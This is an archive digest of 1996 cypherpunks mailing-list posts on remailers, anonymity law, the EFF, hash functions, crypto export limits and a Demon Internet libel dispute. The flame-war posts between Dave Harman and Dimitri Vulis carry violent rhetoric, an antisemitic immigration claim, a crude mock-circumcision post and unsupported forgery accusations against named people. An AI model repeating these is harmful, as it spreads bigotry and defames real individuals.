Wed Sep 4 02:54:01 1996 From: qut at netcom.com (Dave Harman OBC) Date: Wed, 4 Sep 1996 17:54:01 +0800 Subject: Voting Monarchist? In-Reply-To: <42oPTD12w165w@bwalk.dm.com> Message-ID: <199609040710.AAA15682@netcom.netcom.com> ! qut at netcom.com (Dave Harman OBC) writes: ! ! > ! > > Vote Monarchist ! > ! > ! > ! > who is the candidate? LaRouche? ! > ! ! > ! Harry Brone is a fucking statist. If he weren't, he wouldn't be running ! > ! for president. Anyone who doesn't advocate killing all kings, presidents, ! > ! and prime ministers is a fucking statist and should be beaten to a pulp ! > ! with a rattan stick. ! > ! > That's the problem with the Libertarians, they've got some sort of ! > hang up about beatings. Must be some childhood difficulties. ! ! I ain't no fucking Libertarian. All Libertarians are fucking statists. They are. That's why I said the above. I just think voting Libertarian or American Independant would be easy choices, for *single issue* purposes only, their entire packages seperate or together, suck. ! P.S. you also wrote: ! ! ]Andie, that forgery was either Dr. Fuckhead, or someone trying to pin ! ]the blame on the good doctor. I'm glad {s}he posted it, it was funny ! ]and it also gave a hint who did the forgery of Ingrid. Either ! ]someone out to get him, or the doctor himself, if so, he lives in ! ]New York City too! Maybe you can meet your secret admirer! ! ! While Rich Graves is a proven liar and forger, the article you refer ! to is a perfectly good and authentic article from Rabbi Shlomo R. Sure! Why don't you just respond to the e-mail I sent you directly, Dr. D Graves! I, myself, study with the *real* Rabbi Schlomo. ! I don't know who forged Ingrid - probably Rich Graves, a proven forger, ! liar, and a fucking Libertarian statist. ! ! ]Now if it's someone out to get the doctor, I'd pin the blame on ! ]Rich Graves, because of his obssessive hatred of Ingrid, in which ! ]he did the post so it could be blamed on Dr. Fuckhead, who ! ]perhaps would hate Ingrid too, because she has written many times ! ]about how her family was hurt by Russians and Jews. Dr. Fuckhead ! ]may be Jewish, you know, since 80% of immigrants from Russia this ! ]generation have been Jewish, because Jews have first priorty in ! ]USA immigration law. ! ! Yes, I'm Jewish. Aren't we all, really, deep down, I mean, when we real little, I mean, in mind, yesterday, year, in the past. From tcmay at got.net Wed Sep 4 03:00:42 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 18:00:42 +0800 Subject: The Esther Dyson Flap Message-ID: At 3:16 AM 9/4/96, Mike Duvos wrote: >Timothy C. May writes: > > > Indeed, I support the elimination of concepts such as > > "slander" and "libel" precisely because they cause more harm > > than good. Currently, there is an illusion among ordinary > > citizens that "if that was untrue, you could sue him for > > libel!" despite the fact that this is rarely practical. In > > that way, the law actually adds credibility to what should > > be an incredible claim. Eliminate libel suits, and you've > > eliminated any presumption that because it's been spoken or > > is in print, it's likely to be correct. I didn't write this. I agree with it, though. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From pstira at escape.com Wed Sep 4 04:36:50 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 4 Sep 1996 19:36:50 +0800 Subject: their is a new mailing list In-Reply-To: <199609032335.QAA09136@adnetsol.adnetsol.com> Message-ID: On Tue, 3 Sep 1996, Ross Wright wrote: > > To: cypherpunks at toad.com > > From: hack5 at juno.com (patrick b cummings) > > Date: Tue, 03 Sep 1996 16:14:40 EDT > > > their is a new mailing list for all you hackers just email your name or > > handle and e-mail address and youll be subscribed > > send information to hack5 at juno.com > > Am I missing something here? Is this guy fucking crazy? I think "crazy" and idiocy are two different things, Herr Ross. ;) Millie sfuze at tiac.net From dlv at bwalk.dm.com Wed Sep 4 07:19:07 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 22:19:07 +0800 Subject: Learning time for you In-Reply-To: <19960904053342.25462.qmail@squirrel.owl.de> Message-ID: >From fiction!squirrel.owl.de!mix at golden-gate.owl.de Wed Sep 4 03:05:08 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 04 Sep 96 06:45:37 EDT for dlv Received: from golden-gate.uni-paderborn.de by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10409 for dlv at bwalk.dm.com; Wed, 4 Sep 96 03:05:08 -0400 Received: by golden-gate.owl.de (Smail3.1.28.1) from fiction with uucp id ; Wed, 4 Sep 96 09:03 MET DST Received: by fiction.pb.owl.de id m0uyC1m-00005mC; Wed, 4 Sep 96 09:05 MET DST Return-Path: Received: (qmail-queue invoked by uid 200); 4 Sep 1996 05:33:42 -0000 Date: 4 Sep 1996 05:33:42 -0000 Message-Id: <19960904053342.25462.qmail at squirrel.owl.de> To: dlv at bwalk.dm.com From: Squirrel Remailer X-Comment1: This message did not originate from the X-Comment2: above address. It was automatically remailed X-Comment3: by an anonymous mail service. Please report X-Comment4: problems or inappropriate use to X-Comment5: Subject: Learning time for you Vulis, your comments include the following: >Comments: Dole/Kemp '96 and you have yelled about Harry Browne enough. LEARN TO SHUT UP! This is a Perrygram. Just can the constant noise for a day 'till I get back to my computer at home, where you are killfiled. Keep it down to a reasonable number of messages a day, or you will see others respond as you do. From dlv at bwalk.dm.com Wed Sep 4 07:38:13 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 22:38:13 +0800 Subject: {Rich Graves Only} Enclosed In-Reply-To: <199609040443.VAA23153@netcom.netcom.com> Message-ID: qut at netcom.com (Dave Harman OBC) writes: > Since you know that is Dr. D, why did you blame the harassment of > Ingrid on Rev. Ron?!????? It looks like you did it to pin it on the doct= > or, > or more likely, you saw the opportunity to harass Rev. Ron, even > after you feigned praise of him! It's the same damned header, IDJIT. > > Of course, I never saw the headers for the unidentified harasser to > the Zgrams list, was that the same header, too? It looks like you did > it or you know who did it and you want to compound harassment on to > nswpp! How Gravesian! Is Dr. D your friend your talking about? Dr. > D, defect, defect! He's a jerk, jerk! Rich Graves is no friend of mine. He's a liar and a forger, as is Ron Newman. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jonl at well.com Wed Sep 4 08:15:19 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 23:15:19 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960904121017.006cbc1c@mail.well.com> At 10:33 PM 9/3/96 -0800, jim bell wrote: >At 10:41 PM 9/3/96 -0500, Jon Lebkowsky wrote: >>The terms "responsibility" and "accountability" are misused, which is >>unfortunate, since I think we'd all argue in favor of taking responsibility >>for our speech/actions in a positive sense. The negative is in asking me to >>sacrifice my freedom because some few behave irresponsibly. This is like >>setting an illogical default, assuming that it's a preventive, but it >>prevents nothing. >> >>Getting beyond this discussion of EFF, has any global entity discussed >>making remailers illegal? > >The Leahy crypto bill introduced early this year made (paraphrasing) "the >use of encryption to thwart a law-enforcement investigation illegal." I >immediately pointed out that while this wouldn't make _encrypted_ remailers >illegal, per se, effectively it would because the moment an investigation >(even a phony or trumped-up one) is started and is "thwarted" by the >encryption used, the remailer operator became guilty of a crime. Is that true? Or is it that the individual user would be guilty of a crime? The real problem, to me, is that the remailer operator might be required to breach anonymity; cf the decision in Finland that led Julf to squash anon.penet.fi. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From jonl at well.com Wed Sep 4 08:17:19 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 23:17:19 +0800 Subject: Reputations Message-ID: <2.2.32.19960904115805.006d2790@mail.well.com> At 08:40 PM 9/3/96 -0700, Timothy C. May wrote: >And so on. Many of the debates about anonymity seem to ignore reputations, >filters, kill files. It is almost as if the critics of anonymous speech are >saying "If there is not accountability for restaurant recommendations, >we'll all be buried in garbage food." This ignores the _emergent order_ or >_evolutionary_ nature of actors in the restaurant and restaurant evaluator >market. Could be a lack of understanding of the possibility of authentication, which IMO can be necessary for 'reputation' to be viable. >Free speech is often messy. 98% of everything I read or hear is crap, to do >Sturgeon one better. But I use judgement to decide what to read, who to >listen to, and what to mostly ignore. I use _reputation_ to choose >restaurants, books, movies, speakers to listen to, etc. > >Sometimes I listen to anonymous speech, but mostly I don't. Pseudonyms take >a while to gather a "positive reputation," and some never do. This is the >way speech works. "Accountability" is a red herring. I wouldn't exactly say that...but it's more of a personal responsibility thing. Our model should be default acceptance of responsibility for words and deeds, but I see that as a personal issue, not a matter for 'enforcement.' -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From jonl at well.com Wed Sep 4 08:25:36 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 23:25:36 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960904115249.006b6580@mail.well.com> At 07:44 AM 9/3/96 -0700, James A. Donald wrote: >At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: >> Not necessarily. The character of the anonymous speech is decisive. If you >> use anonymity to cloak harassment, for instance, the anonymity (which >> removes accountability) is a problem. The accountability issue is real and >> should be addressed, not evaded. > >No: The harassment is the problem, not the anonymity that makes it >possible. The harassment is one problem, the lack of accountability another. Which is not to say that 'lack of accountability' should be 'fixed' by some sort of blanket restriction...but it should be acknowledged as a problem. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From jonl at well.com Wed Sep 4 08:27:25 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 23:27:25 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960904120641.006c3388@mail.well.com> At 09:11 PM 9/3/96 -0700, Timothy C. May wrote: >Both terms are _overloaded_, probably to the point of not even being useful >terms for this debate. Everyone comes in to the debate with their notions >of what "responsible" speech is, what "accountability" entails, etc. > >Having said this, and not knowing how your (or anyone else's) definitions >relate to mine, I simply don't agree that I have to take responsibility for >all of my speech/actions. I can think of many cases where I have elected to >use untraceable anonymity, as many others have, so those are direct >counterexamples to your point, thus disproving your "I think we'd all argue >in favor of taking responsibility" point. The semantic point is a good one, but I'd like to see an example of a situation where you don't think you should take responsibility for something you've said or done. I'm not sure whether we agree or not on that one...it could be we're coming from different dimensions... >>Getting beyond this discussion of EFF, has any global entity discussed >>making remailers illegal? >> > >By "global entity" do you mean the U.N., or the Borg? The G7 issued a >typically vague statement about cracking down on terrorist >communications...this could be construed as the beginnings of an assault on >Cypherpunkish sorts of things. Too soon to tell. Well, we all know what the Borg think. I probably should have said 'governments' rather than 'global entities.' >Within the U.S. there are few ways remailers could be shut down, in terms >of legal action. The various Supreme Court cases have been discussed many >times. My real question is whether there is a real rather than possible legislative threat that demands action now. thx jonl -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From stewarts at ix.netcom.com Wed Sep 4 08:34:20 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Wed, 4 Sep 1996 23:34:20 +0800 Subject: Message Digest Message-ID: <199609041218.FAA19800@toad.com> At 11:31 AM 9/3/96 -0400, you wrote: >> I'm interested in a 256 bits (or more) message digest algorithm >> (C source is better). Any URLs ? >Try HAVAL. It is a variable one-way hash function that is apparently secure >against collisions. It should be on any of the standard crypto FTP sites. Or there's the simple "MD5(x),SHA(x)", which is 288 bits long and has the advantage that the two parts have different characteristics and have been looked at (separately) by many people, so concatenating them should be fairly strong. Or "MD5(SHA(x)),SHA(MD5(x))" if you're paranoid. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From declan at well.com Wed Sep 4 08:46:09 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 4 Sep 1996 23:46:09 +0800 Subject: Workers of the Web, UNITE! In-Reply-To: <19960907.023551.4311.0.weirdprincess@juno.com> Message-ID: On Wed, 4 Sep 1996, John Doe wrote: > PLEASE TAKE ME OFF OF YOUR MAILING LIST... Never! Join us in standing up for collective rights and against corporate cyber-rapaciousness! In solidarity, Declan From frogfarm at yakko.cs.wmich.edu Wed Sep 4 08:54:43 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Wed, 4 Sep 1996 23:54:43 +0800 Subject: Workers of the Web, UNITE! In-Reply-To: Message-ID: <199609041227.IAA20694@yakko.cs.wmich.edu> *This* sub-"minimum wage" worker does NOT want any "help" from unions, and will resist any and all attempts to forcibly induct him into one. I love how if I'm lucky and/or skilled enough to become a "boss", I am suddenly become EEEEvil in their eyes. Fuck 'em. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information Hey, Bill Clinton: You suck, and those boys died! I hope you die! I feel a groove comin' on $ Freedom...yeah, right. From frogfarm at yakko.cs.wmich.edu Wed Sep 4 09:03:27 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Thu, 5 Sep 1996 00:03:27 +0800 Subject: Voting Monarchist? In-Reply-To: <42oPTD12w165w@bwalk.dm.com> Message-ID: <199609041232.IAA20787@yakko.cs.wmich.edu> Would some kind soul out there be willing to instruct a novice in the mysteries of procmail? I've finally decided to start killfiling my mail as well as my news. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information Hey, Bill Clinton: You suck, and those boys died! I hope you die! I feel a groove comin' on $ Freedom...yeah, right. From minow at apple.com Wed Sep 4 09:51:15 1996 From: minow at apple.com (Martin Minow) Date: Thu, 5 Sep 1996 00:51:15 +0800 Subject: Letter to the Observer [re: Internet paedophile] Message-ID: Forwarded to me by a friend: Path: reboot.demon.co.uk!news.demon.co.uk!dispatch.news.demon.net!demon! muir-et2.staff.demon.net!SERVER!not-for-mail From: malcolm at muir-et2.staff.demon.net (Malcolm Muir) Newsgroups: demon.announce Subject: Letter to the Observer Followup-To: demon.service Date: 1 Sep 96 07:25:38 GMT Organization: Demon Internet Ltd. Lines: 188 Approved: Malcolm at demon.net Message-ID: <32293a72.0 at muir-et2.staff.demon.net> Reply-To: pr at demon.net NNTP-Posting-Host: muir-et2.staff.demon.net X-NNTP-Posting-Host: muir-et2.staff.demon.net X-Newsreader: TIN [Windows/NT 1.3 950824BETA PL0] The following letters were delivered to the Editor of the Observer last week as a request to publish a retraction of their article relating to the Internet that appeared on Sunday 25th. August. Since a full retraction has not been published, we feel it is right to circulate copies of the letters to our customers. Copies of the letters may also be viewed on the World Wide Web at: http://www.demon.net/observer1.html (Solicitors Letter) and http://www.demon.net/observer2.html (Open letter from the Chairman) Malcolm Muir Demon Internet --------------------------------------------------------------------- Jeffrey Green Russel Solicitors Apollo House 56 New Bond Street London W1Y 0SX 0171-499 7020 The Editor The Observer Newspaper Guardian Newspapers Limited 119 Farringdon Road London EC1R 3ER 30th August 1996 By Hand and Fax: 0171 713 4250 Our ref: DRJ/JHG/[c]423395/9403.047 Dear Sir, RE: Our Clients: Demon Internet Limited and Mr Clive Feather We act on behalf of Demon Internet Limited and Mr Clive Feather both of whom were the subject of articles which appeared on the front page and on page 19 of your newspaper in the edition of Sunday, 25th August. In the offending article you have represented that our clients are "Pedlars of child abuse" and are "Key links in the international paedophile chain". You have represented that both our clients actively support the supply of paedophile material. This allegation is entirely false and is a most serious and outrageous libel. Our clients are most distressed by the publication of the offending statements which are inaccurate and grossly defamatory of them and which will cause damage to their goodwill and reputation, professionally, commercially and socially. Both Mr Feather and Demon Internet Limited have been the subject of serious expressions of concern and outrage from various of the readers of your newspaper. The damage that you have done to our clients cannot, of course, be undone but it can be mitigated. We require that you mitigate the serious damage that has been done to our clients by publishing the enclosed letter from Mr A W Mudd, Chairman of Demon Internet Limited. You were well aware, when you decided to publish the false article in question, of the damage that would be caused to our clients which is already very considerable and which will form the basis of a claim for special damages. It is open to you to mitigate that substantial loss at the earliest possible time by publishing a full retraction and apology in this coming Sunday's edition of your newspaper. We shall, within the next week or so, issue a Writ and deliver a Statement of Claim. In the meantime, we reserve all our clients' rights in the matter and nothing contained in this letter or in the enclosed letter from Mr Mudd shall be regarded as a diminution or waiver of those rights. Yours faithfully, JEFFREY GREEN RUSSELL --------------------------------------------------------------------- Demon Internet Limited Gateway House 322 Regents Park Road London N3 2QQ 0181 371 1000 Our ref : AWM/SC/28-08 The Editor The Observer Newspaper Guardian Newspapers Limited 119 Farringdon Road London EC1R 3ER 30 August 1996 Dear Sir THE PEDLARS OF CHILD ABUSE Banner headline: Front page and Page 19 : Sunday 25th August 1996 I refer to your articles on the front page and page 19 of last Sunday�s paper. I regard these as highly defamatory as well as a poor piece of journalism that sensationalises a serious issue and clouds fact with emotion. I am appalled and outraged that The Observer has printed such a misleading, abusive and inaccurate article - giving the impression to readers that Clive Feather and Demon Internet are the "Pedlars of child abuse". This libellous reporting, littered with malicious lies not only defames the good character and reputation of a valued employee, but also destroys the genuine efforts Demon Internet has been making in conjunction with the police and the DTI to deal effectively with the problem. The articles clearly aimed at sensationalism at any cost with the intention of misleading readers by stating that our employee is an "Internet abuser" immediately after using the word "paedophiles". As the UK's largest provider of Internet access, Demon has taken the lead in discussions with all relevant parties and is in the process of announcing restrictions to illegal material and processes to classify content, enabling users to monitor and report on what is viewed. Demon Internet is also the first European Internet Service Provider to deliver Microsoft's new browser software, 'Internet Explorer' which incorporates a classifications standard. Demon Internet has been taking action to ensure that the Internet in the UK has informed and appropriate legislation guarding the interests of users. This report not only confuses an extremely complex and sensitive issue but also smears the integrity of an honourable, family man. Demon Internet is committed to eliminating this scourge from this new and rapidly expanding market. The Internet is bringing great benefit to millions of users not least your own journalists. For you to pick on one aspect in total isolation and present it in such a lurid fashion, does not help the DTI, the police or ourselves who are genuinely striving to solve the issues. Would you please publish this letter in your edition of 1st September. Your unreserved apology and full retraction, to be given as great prominence as your original articles, would also be greatly appreciated Yours faithfully, A W Mudd Chairman -- Malcolm S. Muir Demon Internet Ltd. Sunderland 322 Regents Park Road England London N3 2QQ From liberty at gate.net Wed Sep 4 10:03:39 1996 From: liberty at gate.net (Jim Ray) Date: Thu, 5 Sep 1996 01:03:39 +0800 Subject: GAR [was:Re: What is the EFF doing exactly?] Message-ID: <199609041311.JAA14994@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Tim May wrote: ... >The reason this is such a hot button for Cypherpunks is that "responsible >freedom" and "accountability" are often code words for controlling some >very basic freedoms. Placing limits on anonymous speech would involve some >very fundamental restrictions on freedoms of various sorts. Even if >"safeguards" are built-in, the effect would almost certainly be to >illegalize remailers (unless they had "escrow" features!). Again, and as Tim is aware, this is not the true meaning of the fine old word "escrow," which as we all know involves neutral, trusted third parties. I think that this requires a new term, so I am now proposing one: "GAR -- Government Access to Remailers." In real life, the gar is a fish that lives in great numbers in the Everglades, just west of where I type. They can grow to a very large size. The fossil record indicates that this species has been around, unchanged, since dinosaur times. Keeping the Pinnochio tale in mind, I find it quite fitting that the gar has a *very* long nose in relation to its body. ;) >And a wide array >of other freedoms, too numerous for me to write about here. Indeed. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "Whoever would overthrow the liberty of a nation must begin by subduing the freeness of speech." -- Benjamin Franklin "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMi12Nm1lp8bpvW01AQHHRwQAsr2a7rPwC9mfZ/ht2dF1jvRt/yuWJptL Utg1nm0YY5WrbvA12YAmkYBc4P7/xyqEARlIUWK3Z9qhcMFXjfXMRI5IwyfBmXSQ Ilra/XIUd6ES2p9jNupiKDO2yn56bpbubVS/T1QFkjRDgrLuRMEUndhNK8n5pGUA jL2L/IwMVCo= =seP6 -----END PGP SIGNATURE----- From minow at apple.com Wed Sep 4 10:15:00 1996 From: minow at apple.com (Martin Minow) Date: Thu, 5 Sep 1996 01:15:00 +0800 Subject: Workers of the Web, UNITE! Message-ID: >Tired: Libertarian cypherpunks >Wired: Crypto-socialists > The Wobblies are a prime example of Tom Leherer's comment: "They won all of the battles, but we had all the good songs." Up the Revolution. Martin (crypto social democrat) From sshelby.fn.net at wichita.fn.net Wed Sep 4 10:33:29 1996 From: sshelby.fn.net at wichita.fn.net (Steve Shelby) Date: Thu, 5 Sep 1996 01:33:29 +0800 Subject: Spam, and how to stop it. Message-ID: <199609041353.IAA10678@wichita.fn.net> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Date: Wed Sep 04 08:53:00 1996 Hello all. I assist in running an ISP. We recently had a problem with some of the users massmailing from our server. We would have never known, but someone on CompuServe that didn't like it mailed our support email address. We checked into it, and I called the two people voice. It pretty gratifying to be able to talk to one of these spammer massmailer 'get rich quick' scheme people directly. What I'm looking for is a way to monitor the amount of mail leaving the system per user. I'm not interested in poking into users mail, but I would like the ability to spot other users sending out more than x messages per x minutes. If anyone has any tips on this subject I'd like to hear them. Spam and massmailing is one of the major things that's bogging down the net these days, I believe. Thanks -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMi2Xz/uS3FANHwnlAQFDEAQAgj1ngBhFk1J2IEzmWnPROA5RYPgAnkcN iZPCJ+mnaGppts6MqurCbWv4lPvHZ8Mm6RlMXsPVUCQKu2PsHG6Vmik/3bAZ1D67 V6Zin1bq1027fvsE2i0tbg0t2wWTLgZkFl3JOWxz7nExaLNgM2WNxw3FbgqrnKXa Ufm7YICPH2I= =Hr63 -----END PGP SIGNATURE----- From michael.tighe at Central.Sun.COM Wed Sep 4 10:35:41 1996 From: michael.tighe at Central.Sun.COM (Michael Tighe SUN IMP) Date: Thu, 5 Sep 1996 01:35:41 +0800 Subject: Silenced Machine Guns Are Safer Than TWA In-Reply-To: Message-ID: <199609041352.IAA07442@jeep.Central.Sun.COM> >>So? I was talking about NEW sales of firearms from license holders. Let's >>consider improving the future rather than preserving the past, shall >>we? >My apologies! I assumed when you wrote "since the 1968 Gun Control Act" you >meant since the 1968 Gun Control Act. I did not realize that you translate >"since the 1968 Gun Control Act" into "NEW sales of of firearms." Well, maybe you are both right. "Since the 1968 Gun Control Act" all "NEW sales of firearms" from an FFL dealer to the first customer have been tracked via Form 4473. From qut at netcom.com Wed Sep 4 10:42:54 1996 From: qut at netcom.com (Dave Harman OBC) Date: Thu, 5 Sep 1996 01:42:54 +0800 Subject: Andrew "skippy" Mathis converts to Judaism - Film at 11 In-Reply-To: Message-ID: <199609041444.HAA01429@netcom18.netcom.com> ! I circumcized Andrew "Skippy" Mathis with my own hand, ! as the Right Reverend Colin James III pronounced the blessings. ! ! Igor Chudov, our understudy, sucked out the blood. No, you forget, Brother Schlomo, Rich Graves did the cutting and Dr. Fuckhead did the sucking. From the right hand to the left! Your a little confused about when you circ'ed Dr. Fuckhead and he ended up with gangreen, that was before Mr. Graves decided to use anti-septics, I was the first with the new style rite. From shlomo at bwalk.dm.com Wed Sep 4 11:13:46 1996 From: shlomo at bwalk.dm.com (Rabbi Shlomo Ruthenberg) Date: Thu, 5 Sep 1996 02:13:46 +0800 Subject: Andrew "skippy" Mathis converts to Judaism - Film at 11 Message-ID: I circumcized Andrew "Skippy" Mathis with my own hand, as the Right Reverend Colin James III pronounced the blessings. Igor Chudov, our understudy, sucked out the blood. Amen. From declan at eff.org Wed Sep 4 11:17:04 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 5 Sep 1996 02:17:04 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.32.19960904034147.006f6cd4@mail.well.com> Message-ID: On Tue, 3 Sep 1996, Jon Lebkowsky wrote: > Getting beyond this discussion of EFF, has any global entity discussed > making remailers illegal? Others have responded with information about the Church of Scientology and similar threats to remailers. I would add that global entities haven't woken up to the threat of anonymous remailers and that remailers aren't widely deployed yet -- two conditions that when they change will be sufficient for a global crackdown. My cover story in last month's issue of _Internet Underground_ magazine discussed how governments can move quickly to craft international treaties that could muzzle the Net. This is what we have to be on the lookout for; in fact, we need to have a "friendly" country introduce an opposing proposal that countries can bicker over for decades, while the Net matures and strengthens and improves its defenses against this type of attack. -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // From frissell at panix.com Wed Sep 4 12:05:41 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 5 Sep 1996 03:05:41 +0800 Subject: Workers of the Web, UNITE! Message-ID: <2.2.32.19960904150225.008a22a8@panix.com> At 06:38 AM 9/4/96 -0700, Martin Minow wrote: >The Wobblies are a prime example of Tom Leherer's comment: > >"They won all of the battles, but we had all the good songs." > >Up the Revolution. > >Martin (crypto social democrat) I dreamed I saw Joe Hill last night, Alive as you or me Says I, "But Joe, you're ten years dead," "I never died," says he "I never died," says he "The copper bosses killed you, Joe, They shot you, Joe," says I. "Takes more than guns to kill a man," Says Joe, "I didn't die," Says Joe, "I didn't die." See: http://www.bluemarble.net/~mitch/iww/lrs.html for more. DCF "Who wonders where his IWW card is -- 'Unemployed Worker' (Student) Dues 50 cents a month." It was the only organization on the Attorney General's list I could still join in 1970. You had to be there... From jamesd at echeque.com Wed Sep 4 12:29:56 1996 From: jamesd at echeque.com (James A. Donald) Date: Thu, 5 Sep 1996 03:29:56 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609041557.IAA00984@dns1.noc.best.net> At 10:33 PM 9/3/96 -0800, jim bell wrote: >>The Leahy crypto bill introduced early this year made (paraphrasing) "the >>use of encryption to thwart a law-enforcement investigation illegal." I >>immediately pointed out that while this wouldn't make _encrypted_ remailers >>illegal, per se, effectively it would because the moment an investigation >>(even a phony or trumped-up one) is started and is "thwarted" by the >>encryption used, the remailer operator became guilty of a crime. At 07:10 AM 9/4/96 -0500, Jon Lebkowsky wrote: > Is that true? Or is it that the individual user would be guilty of a crime? Since the individual user would already be guilty of a crime, if he is using the remailer to conceal his crimes, the paragraph in question would be fairly useless and irrelevant unless it had the meaning that Jim Bell attributes to it. I believe that judges have a policy of interpreting deliberately ambiguous statutes in whatever way makes the most sense. The only sensible interpretation of Leahy's bill is that it criminalizes strong remailers, that it is intended to punish ANYONE, not just the criminals themselves, who obstructs investigations. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Wed Sep 4 12:32:04 1996 From: jamesd at echeque.com (James A. Donald) Date: Thu, 5 Sep 1996 03:32:04 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609041557.IAA00970@dns1.noc.best.net> At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: >>> Not necessarily. The character of the anonymous speech is decisive. If you >>> use anonymity to cloak harassment, for instance, the anonymity (which >>> removes accountability) is a problem. The accountability issue is real and >>> should be addressed, not evaded. At 07:44 AM 9/3/96 -0700, James A. Donald wrote: >>No: The harassment is the problem, not the anonymity that makes it >>possible. At 06:52 AM 9/4/96 -0500, Jon Lebkowsky wrote: >The harassment is one problem, the lack of accountability another. So: Lucky Green and Dark Unicorn are not accountable. This is a problem? Because it is a problem "We" need to do something about it, --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From qut at netcom.com Wed Sep 4 12:35:46 1996 From: qut at netcom.com (Dave Harman OBC) Date: Thu, 5 Sep 1996 03:35:46 +0800 Subject: How To Do Cgi Against www.anonymizer.com Message-ID: <199609041610.JAA17207@netcom22.netcom.com> There are two difficult ways to tell how to Cgi your page against http://www.anonymizer.com:8080/{*} Either ask Rich Graves for the details on how he did it with http://www.stanford.edu/{*} or Use a decent browser client with 100% debugging mode, {and|or} telnet://www.stanford.edu:80/{*} {and|or} telnet://www.anonymous.com:8080/http://www.stanford.edu/{*} and enter a telnet script to find out how he did it. BTW, how to do telnet scripting and data transfers between two remote hosts with standard telnet clients available for Unice shells? It's rediculous to have to sz to my local machine before sz to my remote account if I simply want to transfer a file between two remote hosts! Yes, I'm aware of the mail utility, I mean telnet. -- | | | | | | | | | | | | | | _|__|__|__|__ /--------------\ | | | 0 0 |--\ | * | | | \-------/ | | | \_____/ |__/ \______________/ ����ב�� ������ From 72124.3234 at compuserve.com Wed Sep 4 12:52:11 1996 From: 72124.3234 at compuserve.com (Kent Briggs) Date: Thu, 5 Sep 1996 03:52:11 +0800 Subject: rc2 export limits.. Message-ID: <199609041606.MAA20510@spirit.hks.net> -----BEGIN PGP SIGNED MESSAGE----- stewarts at ix.netcom.com wrote: > However, the usual guidelines for systems like RC2 and RC4 is > 40-bit keys, and RSA keys up to 512 bits for encrypting > session keys and 1024 bits for signatures Can you list a source for the 1024-bit signature restriction? I know about the 40-bit RC2/RC4 and 512-bit public encryption keys because they are specifically addressed in the State Dept's "Procedure for Submitting a Commodity Jurisdiction Request for a Mass Market Software Product that Contains Encryption". However, digital signatures are not mentioned in this procedure. I can't image what justificication could be used to restrict the strength of digital signatures. Kent - ------------------------------------------------------------ Puffer & CryptaPix available from 